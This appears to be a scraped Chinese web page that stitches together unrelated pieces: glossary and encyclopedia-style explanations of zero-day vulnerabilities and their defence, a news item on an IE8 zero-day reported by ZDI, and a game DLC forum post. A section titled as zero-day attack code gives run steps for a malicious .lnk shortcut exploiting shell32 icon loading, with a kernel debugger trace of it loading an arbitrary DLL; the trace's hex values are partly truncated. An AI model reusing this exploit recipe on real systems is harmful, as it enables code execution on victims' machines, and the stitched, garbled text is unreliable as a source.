当前位置： →
作者：佚名&&来源：互联网&&发布时间： 10:24:47
zero-day exploit
　　“零天攻击”即在漏洞发现的同一天就发生了攻击事件。通常情况下，当有人发现软件潜在的被黑客攻击的漏洞时，这个人或公司应通知软件公司或尽可能多的人，这样就能在漏洞被攻击钱进行软件的修复工作。只要有充足的时间，软家开发商就能够修正软件并发布补丁。假使黑客知道了该漏洞，他们也要花费些时间来攻击它。与此同时，也许软件的补丁已经完成了。　　根据经验，一般黑客攻击漏洞在修复漏洞之前，有时是黑客先发现的漏洞。这种情况下，漏洞的发现和攻击会发生在同一天。由于之前并不知道漏洞的存在，所以没有办法防范攻击。暴露于这种漏洞下的公司可以制定一些漏洞早期检测的方法。　　Symantec公司2004前期的报告指出2003年的漏洞发现数量和2002年相同，但漏洞发现和被攻击的时间明显缩短。根据infoAnarchy wiki，“14天”小组和“七天”小组分别在一种产品上市的14天和7天之内进行一次攻击。进行零天攻击需要黑客精英，因为他们必须暗地里进行连接来获得进行攻击时所需的信息
?上一篇名词：
?下一篇名词：
& &评论摘要(共 0 条，得分 0 分，平均 0 分)
按字母检索
按声母检索
版权所有:& 备案编号：豫ICP备号 “法律声明”
Copyright (C)2004 - 2009
Port. All rights reserved.零日漏洞_百度百科
“零日漏洞”(zero-day)又叫，是指被发现后立即被恶意利用的安全漏洞。通俗地讲，即安全补丁与瑕疵曝光的同一日内，相关的恶意程序就出现。这种攻击往往具有很大的突发性与破坏性。
零日漏洞攻击威胁
虽然还没有出现大量的“零日漏洞”攻击，但其威胁日益增长，证据如下：黑客更加善于在发现安全漏洞不久后利用它们。过去，安全漏洞被利用一般需要几个月时间。最近，发现与利用之间的时间间隔已经减少到了数天。
利用漏洞的攻击被设计为迅速传播，感染数量越来越多的系统。攻击由之前被动式的、传播缓慢的文件和宏病毒演化为利用几天或几小时传播的更加主动的、的电子邮件和混合威胁。
人们掌握的安全漏洞知识越来越多，就有越来越多的漏洞被发现和利用。一般使用、和防病毒软件来保护关键业务IT基础设施。这些系统提供了良好的第一级保护，但是尽管安全人员尽了最大的努力，他们仍不能免遭受零日漏洞攻击。
零日漏洞发现方法
按照定义，有关“零日漏洞”攻击的详细信息只在攻击被确定后才会出现。以下是当发生“零日漏洞”攻击时将看到的重要迹象：发源于一台客户机或服务器的出乎意料的合法数据流或大量的扫描活动；合法端口上的意外数据流；甚至在安装了最新的补丁程序后，受到攻击的客户机或服务器仍发生类似活动。
零日漏洞防御方法
预防：良好的预防安全实践是必不可少的。这些实践包括谨慎地安装和遵守适应业务与应用需要的政策，随时升级防病毒软件，阻止潜在有害的文件附件，随时修补所有系统抵御已知漏洞。是评估预防规程有效性的好办法。
实时保护：部署提供全面保护的(IPS)。在考虑IPS时，寻找以下功能：网络级保护、应用完整性检查、应用协议“征求意见”(RFC)确认、内容确认和取证能力。
计划的事件响应：即使在采用以上措施后，企业仍可能受到“零日漏洞”影响。周密计划的事件响应措施以及包括关键任务活动优先次序在内的定义的规则和规程，对于将企业损失减少到最小程度至关重要。
防止传播：这可以通过将连接惟一限制在满足企业需要所必须的机器上。这样做可以在发生初次感染后，减少利用漏洞的攻击所传播的范围。
“零日漏洞”攻击对于警惕性最高的系统管理人员来说也是一种挑战。但是，部署到位的安全护保措施可以大大降低关键数据和系统面临的风险。
零日漏洞攻击代码
1. Unzip the files in 'C: \'. Start a DbgView or paste a KD to your VM.
2. Rename 'suckme.lnk_' to 'suckme.lnk' and let the magic do the rest of shell32.dll.
3. Look at your logs.
Tested under XP SP3.
Breakpoint 1 hit
eax= ebx=00f5ee7c ecx= edx= esi= edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0
nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712 ff15a0159d7c call dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)] ds:d15a0={kernel32!LoadLibraryW (7c80aeeb)}
kd& dd esp
00f5e9c4 00f5ee7c 000a27bc 00f5ee78
00f5e9d4 ee7c
00f5e9e4 00
00f5e9f4 000e0 00028c
00f5ea04 ac
00f5ea14 006c006c 6c006c 006d002e
00f5ea24 006e9 00074
00f5ea34 c900
kd& db 00f5ee7c
00f5ee7c 43 00 3a 00 5c 00 64 00-6c 00 6c 00 2e 00 64 00 C.:.\.d.l.l...d.
00f5ee8c 6c 00 6c 00 00 00 92 7c-c8 f2 f5 00 00 17 72 02 l.l....|......r.
00f5ee9c 4b d2 00 00 d8 f2 f5 00-8b d2 a1 7c 00 00 00 00 K..........|....
00f5eeac ac 80 9d 7c 30 d8 0d 00-34 d8 0d 00 b8 d7 0d 00 ...|0...4.......
00f5eebc 9a d2 a1 7c 30 d8 0d 00-c8 f2 f5 00 50 40 15 00 ...|0.......P@..
00f5eecc 50 40 15 00 00 00 00 00-b8 00 92 7c 40 b7 0c 00 P@.........|@...
00f5eedc a8 ef f5 00 41 00 92 7c-18 07 09 00 5d 00 92 7c ....A..|....]..|
00f5eeec c8 f2 f5 00 00 ef f5 00-00 00 00 00 b8 00 92 7c ...............|
ChildEBP RetAddr Args to Child
00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])
00f5ee50 7caee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])
00f5f294 7cbb4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])
00f5f2b8 7ca82 00104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])
00f5f2d4 7ca1d306 000a25ac f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])
00f5f410 7ca133b6 000dd7e0 f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])
00f5f77c 7ca03c88 000dd7e0 5aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])
00f5f7a4 7cac60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])
00f5fe20 7ca12db0 5aa00
SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])
00f5fe40 7ca15e3c 31c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])
00f5fe68 7ca90
SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])
00f5fe84 75f11b9a 000fb18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])
00f5fee0 77f58 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])
00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])
00f5ff40 7c937b03 77fcb748
ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])
00f5ff60 7c937bc5 cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])
00f5ff74 7c937b9c 7c937ae9 cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])
00f5ffb4 7c80b729 edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])
00f5ffec c00 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])
零日漏洞相关新闻
零日漏洞来袭 微软狠遭考验
微软无法在研究人员给定的合理时间里解决最初在2013年10月发现的IE浏览器零日漏洞，因此这个漏洞现在已经正式公开。　　惠普零日项目（Zero-Day Initiative, ZDI）是一个在Pwn2Own黑客竞技研究团队。根据他们所发布的一份报告，IE零日漏洞只影响到微软IE 8。当浏览器处理CMarkup对象时，这个漏洞就会暴露无遗。　　虽然这个漏洞只影响到IE 8，但是今年2月份在同一个库中又出现另一个问题，攻击者可以利用这个漏洞获得IE 10的本地访问权限。对于这个漏洞，微软在公开宣布这个漏洞之前就发布了一个“修复”工具包。　　当用户访问一个恶意网站时，就可能触发当前这个漏洞，如果黑客成功入侵这个漏洞，那么他就可以在受攻击的主机上远程执行任何代码，以及获得与当前用户相同的访问权限。用户交互会加剧这个漏洞的严重性——通用漏洞评分系统将这个漏洞评定为6.8分。　　ZDI报告指出：“然而，在所有情况中，攻击者可能并没有办法迫使用户查看攻击者所控制的内容。相反，攻击者可能不得不用一些手段说服用户自己主动去操作。通常就是诱导用户去点击邮件内容或即时消息中的一个超链接，从而让用户访问攻击者的网站，或者诱导用户打开电子邮件的附件。”　　ZDI指出，他们第一次是在2013年10月份向微软报告了IE零日（CVE-）漏洞，当时是比利时安全研究员Peter Van Eeckhoutte发现了这个漏洞，随后微软在2014年2月确认了这个问题。ZDI通常给供应商预留180天的漏洞处理时间，之后他们才会向公众公开漏洞，这表示微软在4月份之前都有时间修复这个漏洞。　　在这个事件中，微软实际上有另一个机会在5月初解决这个问题，但是它同样没有重视ZDI关于公开这个漏洞的警告。近几个月来，微软的安全团队一直在全力奋战——他们被迫在本月初发布了一个用于修复另一个IE零日漏洞的编外补丁，其中还特别包含了一个针对目前已经不提供支持的XP操作系统的修复包。　　ZDI报告提供了一些处理IE零日漏洞的技术方法，其中包括将IE安全域设置为“高”，或者配置浏览器为运行Active Scripting之前弹出提示。或许，解决这个问题的最简单方法是安装和运行微软的增强减灾体验工具套件（Enhanced Mitigation Experience Toolkit），微软自己也非常希望在补丁发布之前就找到处理零日漏洞的方法。[2]
．TechTarget安全．[引用日期]
企业信用信息微信：doyo_game
使命召唤：高级战争-DayZeroDLC免费领取方法
-- & 评论：
　　大家不必花钱收或者很麻烦的交换了
　　我去找了客服，客服给我一个网页，官网的支援那里也有登记
　　地址：
　　用COD账号(注意要关联相关的平台)登陆网页，然后点击领取，记得勾选上方块
　　注意，领取的时候游戏端不要在线，DLC物品会以礼物形式直接送到游戏内!
　　PS:这次被坑大了，季票 Atlas DLC全无法给大号用，我找了两个客服，都说首日DLC可以免费给，但atlas
和季票的问题只能向上级反馈，估计是没戏了
　　动视你真棒!!
/article/190011
阅读本文后，您的心情是：（选择后可查看结果）
= &发表点评
人气：1280644
今日关注游戏